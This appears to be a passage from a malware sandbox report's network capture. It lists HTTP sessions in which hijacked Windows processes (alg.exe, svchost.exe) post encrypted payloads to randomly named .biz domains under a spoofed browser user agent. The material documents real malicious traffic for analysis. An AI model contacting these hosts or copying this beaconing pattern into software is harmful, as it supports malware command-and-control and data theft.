Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              81192.168.2.45004013.251.16.150802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:09.466185093 CEST344OUTPOST /tw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: iuzpxe.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:09.466206074 CEST778OUTData Raw: c4 32 5b 34 a1 a2 35 6a fe 02 00 00 88 5c 56 fa cb a4 7e 44 18 f6 ee bf 26 07 29 e4 39 cb d7 53 b5 ef c4 6b c5 05 e2 1f d2 b3 3f 37 91 5c fc 0f 4d b9 1a 00 18 1d 17 14 74 ef 18 c5 2c 2c 1e 63 32 13 42 57 cd c4 33 a3 3d 4c d6 d1 9d 49 49 2e e8 70
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 2[45j\V~D&)9Sk?7\Mt,,c2BW3=LII.p\KqEu&Lg]"[KGrd-_z+HcjPwc_NR#C;!!s5/3BJAY~OuE,j[4SlX`F";N=l2:N"(@
Oct 8, 2024 15:29:10.821372986 CEST | 408 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:10 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=54166ffff4011c47c38a4ae9255b1470|8.46.123.33|1728394150|1728394150|0|1|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
82 | 192.168.2.4 | 50046 | 3.94.10.34 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:10.265788078 CEST | 347 | OUT | POST /pa HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: gvijgjwkh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.265824080 CEST786OUTData Raw: 67 f7 71 70 5f 3e 4b 15 06 03 00 00 e2 b8 b7 bc 6d d4 43 0d e1 69 6d 85 e4 a4 ea 72 3a b8 b4 03 aa f5 4e fe b6 6d 1d 71 24 4e 7c 4f 73 33 3e e9 d0 58 0c 6e e7 58 dc b7 3d 1c b7 d0 10 89 04 a4 ce a9 e9 41 5b da 82 0a d1 c3 4d f2 05 b7 27 a9 9e df
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: gqp_>KmCimr:Nmq$N|Os3>XnX=A[M'ns.hQ=NUEo]58IK'hH\:de]>j%t'+qItJrke"y!n1)
Oct 8, 2024 15:29:10.748672962 CEST | 411 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:10 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=e24056a60dc3f73560a60443534bc5eb|8.46.123.33|1728394150|1728394150|0|1|0; path=/; domain=.gvijgjwkh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
83 | 192.168.2.4 | 50051 | 44.213.104.86 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:10.970066071 CEST | 345 | OUT | POST /yp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: qpnczch.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.970091105 CEST786OUTData Raw: c5 2e 9b 49 92 2e a4 4d 06 03 00 00 80 bb f0 4d 1c f3 c5 69 f3 36 87 ce ff 53 2c fb f9 bd a5 b7 8a 1c 7e f5 6c 2f 74 2b e6 23 38 6c 51 05 a1 e5 01 8f a0 d2 05 74 e7 78 78 c7 24 c7 7c 66 27 e4 2b 5d 0f a1 93 a7 a0 6e 02 39 26 f7 07 40 19 74 c9 a8
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: .I.MMi6S,~l/t+#8lQtxx$|f'+]n9&@t2I#_C[#yN&vsS&<YT[Z+6MVxu?6)r]lmDP8z vg,J KVP6xP}wp".i@~/%
Oct 8, 2024 15:29:11.445408106 CEST | 409 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:11 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=b5b9110eff8e1bd9c058db50405941a2|8.46.123.33|1728394151|1728394151|0|1|0; path=/; domain=.qpnczch.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
84 | 192.168.2.4 | 50053 | 13.251.16.150 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:11.100301027 CEST | 349 | OUT | POST /ncst HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: sxmiywsfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:11.100336075 CEST778OUTData Raw: ca ca 57 b7 70 e5 1a 6f fe 02 00 00 1a e6 6e b5 9a af 01 29 93 80 e3 a5 2e 63 ce 34 dc e6 12 ea 21 bd 61 bd 8b aa 2d b4 89 4e bc 9a 5f 68 dc d4 1e 73 f9 74 09 09 ad 41 97 55 8b 92 2f 9a bc 78 4b 48 5c 2d d2 ce 5a 94 2b f5 0a e1 27 cc ce d3 ce 62
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Wpon).c4!a-N_hstAU/xKH\-Z+'bNJHZs9Yj<_]oyk15c@3q<2'tx0O18no(Cv;:'v+!{[}.4ge98{@nLA)&<&bIHE]M/a
Oct 8, 2024 15:29:12.444242001 CEST | 411 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:12 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=dba40d597f8777671a96007f0b135c33|8.46.123.33|1728394152|1728394152|0|1|0; path=/; domain=.sxmiywsfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
85 | 192.168.2.4 | 50056 | 3.254.94.185 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:11.560396910 CEST | 343 | OUT | POST /ej HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: brsua.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
Oct 8, 2024 15:29:11.560429096 CEST | 786 | OUT | Data Raw: d6 71 69 18 75 91 57 a5 06 03 00 00 e9 e7 77 bc a1 26 42 5a b8 bd 14 02 d7 69 d6 0f bf 29 01 82 32 1e 4a 12 1e f2 f0 f6 4c 34 1e 30 94 63 93 1f 47 dc e7 2e 96 57 95 ca a9 f8 94 43 72 b8 e9 63 a3 60 5a 59 e2 f8 7f 88 da 93 c9 e2 64 8d 6b 81 7b 17
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: qiuWw&BZi)2JL40cG.WCrc`ZYdk{rB+![E17![:j~)V``@Ao<55*kH6av5p*CYCd'.W,sqJC~&@LP9aTQeXHeF
Oct 8, 2024 15:29:12.440227032 CEST | 407 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:12 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=7a9b16473fed9da6da3242a70ef4b297|8.46.123.33|1728394152|1728394152|0|1|0; path=/; domain=.brsua.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
86 | 192.168.2.4 | 50063 | 85.214.228.140 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:12.618138075 CEST | 357 | OUT | POST /ccheohdfgxjtt HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: dlynankz.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
Oct 8, 2024 15:29:12.618166924 CEST | 786 | OUT | Data Raw: aa 0b a1 9f 90 6f 6a 9f 06 03 00 00 c0 ce c1 83 95 2f a7 19 d9 5d 57 42 f0 ca 66 c9 b0 bd af da 4f a6 8b f0 cc 18 93 f5 36 96 cc 73 b8 9c 4c b7 72 19 69 9b 1a 67 f2 38 42 1c 8e a1 32 03 8e c9 d0 65 ef 28 7e 70 b0 1d 86 c2 df e2 3a 70 7e e0 c8 ca
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: oj/]WBfO6sLrig8B2e(~p:p~@5|~uP3O/-IWv:Qq voAYK0&wApFWFd\;; I{gk&rPPnY@RVd
Oct 8, 2024 15:29:13.246932030 CEST | 166 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.27.2
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:13 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Keep-Alive: timeout=20
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
87 | 192.168.2.4 | 50068 | 34.211.97.45 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:12.810403109 CEST | 354 | OUT | POST /eevmjkkfks HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: vrrazpdh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
Oct 8, 2024 15:29:12.810427904 CEST | 778 | OUT | Data Raw: ff 13 0a fb 57 a9 b2 07 fe 02 00 00 5b c7 f4 31 ae fb 69 5f 64 c8 b1 41 32 52 89 17 6f 2a 6e a3 1f f5 02 b6 64 a5 31 29 e2 5c a5 9c b4 45 6a 64 d4 e0 e7 27 f4 6f 9e 01 4b ea d6 3a 4a f0 d0 1a 73 a4 01 41 07 e6 22 0e 59 95 40 3b d3 a0 64 e3 b5 20
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: W[1i_dA2Ro*nd1)\Ejd'oK:JsA"Y@;d 1Su%}=>2PWFyK%2|cyQoG^XFR|j1\Laxn}^N?PkMAW,rW'>1!g6+7(pW.ssMS* E
Oct 8, 2024 15:29:13.559310913 CEST | 410 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:13 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=47e3aa5b25932e7bb7084b5b25e0260e|8.46.123.33|1728394153|1728394153|0|1|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
88 | 192.168.2.4 | 50070 | 47.129.31.212 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:13.400556087 CEST | 356 | OUT | POST /jqkpdrugusyff HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: oflybfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:13.400583982 CEST786OUTData Raw: 7a b0 9b 69 c1 26 a1 5e 06 03 00 00 64 84 ce 0d 3a e5 52 b0 0a 3c fd 34 1f 8c 5b 9b 1a bb 91 0c 13 02 b0 8f c8 fd 6e 22 a2 13 65 7c 76 88 ef 72 8a c0 9b cd 70 0a f0 f2 4d a4 cc e3 fa 0e 4f 3f ca 55 2a 16 2e d0 2a 97 53 69 a0 a5 73 6d 0e a2 e9 ad
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: zi&^d:R<4[n"e|vrpMO?U*.*Sism_2[Ga^eQ24G%h\rgTumRa4Nf~7Ic7RhvbTT%ea)[|pI`K'!pa^iv__hz!$8"`}dr:^Sd
Oct 8, 2024 15:29:14.746372938 CEST | 409 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:14 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=9fe1046dfb8f8810f2e07953ef68bd6d|8.46.123.33|1728394154|1728394154|0|1|0; path=/; domain=.oflybfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
89 | 192.168.2.4 | 50075 | 47.129.31.212 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:13.693607092 CEST | 353 | OUT | POST /ktcaihfarwj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: ftxlah.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:13.693629980 CEST778OUTData Raw: 74 32 96 82 ab d5 16 0c fe 02 00 00 35 91 6d c7 99 50 e8 b1 37 2e 65 f2 68 45 c2 20 d7 7d dd ee df 85 b9 e9 98 24 ee 20 0e 6d 79 35 f3 5e 6f 0d 44 bb 03 63 68 40 3e da 42 01 68 21 95 f6 fc ed 46 d6 7f 14 3b b2 0d 14 fb 5f 2a f3 2c 12 30 95 52 62
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: t25mP7.ehE }$ my5^oDch@>Bh!F;_*,0Rb<EAR6 4yJizoLgwzo~')1"G_LNcb/3.WCK=JwQ;( ~& xK{'KN4M\3/~k3ooF
Oct 8, 2024 15:29:15.044320107 CEST | 408 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:14 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=a340c351fb837a3cefffbd52818dee5b|8.46.123.33|1728394154|1728394154|0|1|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
90 | 192.168.2.4 | 50083 | 34.211.97.45 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:14.994684935 CEST | 344 | OUT | POST /jqu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: yhqqc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:14.994709969 CEST786OUTData Raw: 04 e6 90 94 ac 68 dd 71 06 03 00 00 ad 99 43 2c f8 35 8f bd 99 74 4c aa 15 15 e5 98 c8 95 33 e8 4e 00 14 85 04 2a 56 52 89 c7 78 41 39 10 84 9f 35 3d 38 aa 81 d6 a2 74 e0 6f 0a 96 59 ae c1 0c 1c 4f cf 88 df 2d 81 18 c5 d7 84 e2 93 61 e8 d4 fe 97
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: hqC,5tL3N*VRxA95=8toYO-aY$H8BKKD0x"EJa|P6fOZC$%`YHk($OZp:,k$e"fvG}=px?A)j
Oct 8, 2024 15:29:15.721455097 CEST | 407 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:15 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=5bddb0f92bcf5b520e7b9275dfbbfcdc|8.46.123.33|1728394155|1728394155|0|1|0; path=/; domain=.yhqqc.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
91 | 192.168.2.4 | 50089 | 13.251.16.150 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:15.672519922 CEST | 346 | OUT | POST /ctr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: typgfhb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
Oct 8, 2024 15:29:15.672548056 CEST | 778 | OUT | Data Raw: 0e c0 47 0f 0f b7 b5 05 fe 02 00 00 75 fd a6 c2 0a e4 4b 5c 91 18 06 28 6d 34 ed 32 2e 25 58 99 91 7f 83 ad d7 76 ac d5 eb a3 58 b5 f6 fb 54 be 26 ad d8 60 f5 b6 ff d3 7d 90 47 f0 b4 e3 0a 63 44 b7 eb e3 3a bb 65 46 4f ad ed 12 ee 04 a3 d8 a7 0e
